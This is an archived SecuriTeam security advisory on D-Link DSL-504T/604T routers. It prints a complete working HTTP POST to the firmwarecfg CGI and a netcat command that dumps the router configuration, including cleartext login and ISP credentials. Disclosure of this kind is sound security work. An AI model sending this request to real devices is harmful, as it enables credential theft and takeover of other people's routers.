[NEWS] D-Link 504T/604T Remote Access
SecuriTeam <[email protected]>
| Newsgroups | gmane.comp.security.securiteam |
|---|---|
| Message-ID | <[email protected]> |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - D-Link 504T/604T Remote Access ------------------------------------------------------------------------ SUMMARY DSL-504T/604T is "a D-Link ADSL modem/router with a Linux system on it based on MIPS 4KEc version 4.8". A vulnerability in router's management system, exploiting this vulnerability allows attackers to take full control over the DSL-504T/604T device. DETAILS Vulnerable Systems: * D-Link 504T/604T running MIPS 4KEc version 4.8 uname: Linux version 2.4.17_mvl21-malta-mips_fp_le ([email protected]) (gcc version 2.95.3 20010315 (release/MontaVista)) #71 Tue Feb 17 01:16:45 GMT 2004 By calling the firmwarecfg CGI through a POST request with some additional parameters, an attacker can retrieve the remote host's configuration settings. Exploit: POST /cgi-bin/firmwarecfg HTTP/1.1\r\n Host: 192.168.8.4\r\n User-Agent: yeah\r\n Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, image/png,*/*;q=0.5\r\n Accept-Language: en-us,en;q=0.5\r\n Accept-Encoding: gzip,deflate\r\n Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n Keep-Alive: 300\r\n Connection: keep-alive\r\n Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n Content-Length: 234\r\n \r\n -----------------------------41184676334\r\n Content-Disposition: form-data; name="config.x"\r\n \r\n \r\n -----------------------------41184676334\r\n Content-Disposition: form-data; name="config.y"\r\n \r\n \r\n -----------------------------41184676334--\r\n \r\n Saving this stuff in a file and then doing something like: cat lamepost.txt | nc ipaddress 80 > ipaddress.config.xml Will dump the router configuration into the file ipaddress.config.xml. The username and password will be written to this file in cleartext, including those used to connect to the Internet provider. ADDITIONAL INFORMATION The information has been provided by Alessandro Audero. ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected] ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.